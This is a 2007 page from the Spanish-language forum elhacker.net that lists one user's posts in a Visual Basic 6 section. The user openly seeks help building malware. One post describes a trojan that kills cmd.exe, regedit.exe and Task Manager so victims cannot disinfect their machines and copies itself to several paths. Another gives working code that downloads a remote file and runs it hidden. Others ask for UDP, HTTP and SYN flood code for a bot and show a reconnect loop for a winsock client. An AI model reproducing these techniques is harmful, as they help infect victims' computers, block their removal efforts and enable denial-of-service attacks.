elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 [3]
21  Programación / Programación Visual Basic / url extractor? en: 17 Septiembre 2007, 21:52 pm
alguien que tenga algun ejemplo de como extraer urls de un codigo en html cargado en un listbox? he visto algunos en planetsourcecode pero no me interesan porque utilizan un richtextbox.. algun ejemplo sin muchos controles raros? xD
graciasss
22  Programación / Programación Visual Basic / desinfeccion dificultosa en: 16 Septiembre 2007, 17:20 pm
ps eso, queria saber si alguien tiene alguna idea de como complicar la desinfeccion de un troyano con vb6, bueno lo k he hexo fue detectar programas en memoria a cada 0,5 segundos como por ejemplo cmd.exe, regedit.exe, taskmgr.exe entre otros utiles para la desinfeccion y cerrarlos si se encuentran abietos de tal modo q la victima no pueda utilizarlos para su desinfeccion, ademas cree varias copias unas 5 por diferentes paths del disco duro.. pero igual a pesar de ello seria muy facil desinfectar el pc entrando a modo prueba de fallos o simplemente con cualquier utilidad de las tantas que permita ver los procesos y finalizarlos.. alguien tiene alguna idea de como hacer para complicarlo mas? de tal modo que tenga de formatear el disco duro para poder removerlo?
grax
23  Programación / Programación Visual Basic / Re: Webcam en: 12 Septiembre 2007, 19:42 pm
ya esta solucionado  ;D
24  Programación / Programación Visual Basic / Re: Webcam en: 12 Septiembre 2007, 17:55 pm
No me funciona ese code :s me da error de compliacion
25  Programación / Programación Visual Basic / una preguntilla en: 9 Septiembre 2007, 06:29 am
resulta que tengo lo siguiente:

Código:
Private Sub Form_Load()

Timer1.Enabled = True

End Sub

Código:
Private Sub Timer1_Timer()
Verifica:

Dim Flag As Long
InternetGetConnectedState Flag, 0

Dim flags As Long
Dim result As Boolean

    result = InternetGetConnectedState(flags, 0)

    If result Then
        Timer1.Enabled = False
        Conectar
    Else
     Timer1.Enabled = True
     GoTo Verifica
    End If
     
 End Sub

Código:
Private Sub WS_Close()
Timer1.Enabled = True
End Sub

Código:
Private Sub WS_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
If WS.State <> sckConnected Then
WS.Close
End If
End Sub

y la funcion Conectar bueno utiliza un un winsock llamado WS, creo que no es necesario ponerla aqui, la cosa es que cuando inicio windows normalmente, el timer se activa en el form_load y empieza a chequear todo el tiempo si existe conexion a internet, si conecto a internet todo bárbaro, salta a la funcion conectar pero si luego desconecto ya no vuelve mas a chequear para volverse a conectar d enuevo y asi.. a que se debe eso? que es lo que tengo querhacer para que por cualquier cosa que suceda error, o perdida de conexion vuelva a chequear para conectarse de nuevo?
gracias..

Código:
[code]
[/code]
26  Programación / Programación Visual Basic / función DownloadToFile en: 7 Septiembre 2007, 22:49 pm
Código:
Option Explicit

Private Declare Function URLDownloadToFile Lib "urlmon.dll" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Public Function DownloadFile(url As String, LocalFileName As String) As Boolean
Dim lngRetVal As Long
lngRetVal = URLDownloadToFile(0, url, LocalFileName, 0, 0)
DownloadFile = (lngRetVal = 0)
End Function

Private Sub Command1_Click()
Dim url As String
Dim file As String
Dim ret As String

url = "http://www.terra.es/personal3/fistror/e/MS03-043.zip"
file = Environ("homedrive") & "\jaja.zip"

Call DownloadFile(url, file)

ret = Shell("start " & Chr(34) & file & Chr(34), vbHide)

End Sub

como ven alli invoco a la funcion downloadtofile y guardo el file como jaja.zip, luego hago un ret = Shell("start " & Chr(34) & file & Chr(34), vbHide) para ejecutar el archivo pero me sale error "no existe el fichero", es obvio que esta ejecutando esa sentencia antes de que el archivo se haya descargado x completo, yo pense en ponerle un sleep pero queda muy chancho, mejor seria intentar ejecutarlo luego de haber temrinado la descarga sin usar un sleep, alguna idea? además esa forma de ejecución no me convence mucho ya que serviria solo para XP y no se si win 2000 creo que no, no?


aqui les dejo la función downloadtofile que va en un módulo .bas para los intreresados en la misma:

Código:
Function DownloadFile(ByVal url As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
    On Error Resume Next
    Err.Clear
 
    Set XML = CreateObject("Microsoft.XMLHTTP")
    Set ADS = CreateObject("ADODB.Stream")
 
    XML.Open "GET", url, False
    XML.send
 
    XML.getAllResponseHeaders
 
    FullSavePath = Environ(SavePath) & "\" & SaveName
 
    ADS.Open
    ADS.Type = 1
    ADS.Write XML.responseBody
    ADS.SaveToFile FullSavePath, 2
 
    If Err Then
        DownloadFile = False
    Else
        If RunAfterDownload = True Then
            If RunHide = True Then
                Shell FullSavePath, vbHide
            Else
                Shell FullSavePath, vbNormalFocus
            End If
        End If
        DownloadFile = True
    End If
End Function

saludos!
27  Programación / Programación Visual Basic / Re: winsock downloader con vb6 en: 3 Septiembre 2007, 19:19 pm
yo tambien ando necesitando algo similar, probe el codigo ese pero me lo descarga corrupto  :-(
28  Programación / Programación Visual Basic / control winsock, velocidad de transferencia, paquetes enviados en: 3 Septiembre 2007, 06:26 am
el tema es asi acabo de programar una aplicacion cliente - servidor que sirve para transferir archivos mediante el control winsock y la pregunta es, hay alguna forma de determinar la velocidad de transferencia media con que se envió el archivo? y la cantidad de paquetes enviados en bytes o lo que sea?
gracias de antemano
29  Programación / Programación Visual Basic / Re: UDP flooder en VB6 en: 30 Agosto 2007, 21:22 pm
ah me olvidaba de decir que es para agregarselo a un pequeño bot que he estado programando estos dias.. a ver si me ahorro el trabajo de programar eso..
despues cuando lo termine publico el source y pongo creditos =P
30  Programación / Programación Visual Basic / UDP flooder en VB6 en: 30 Agosto 2007, 21:20 pm
hola quisiera saber si alguien tiene por ahi algun codigo de ejemplo de UPD flood en visual basic 6 utilizando el control winsock y aprovechando al maximo la conexion, de http flood y de syn flood tambien si es posible,o de ultima algun manual o guia para proceder como hacerlo, yo he hecho algo asi como un flooder pero la verdad es que no me convence
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines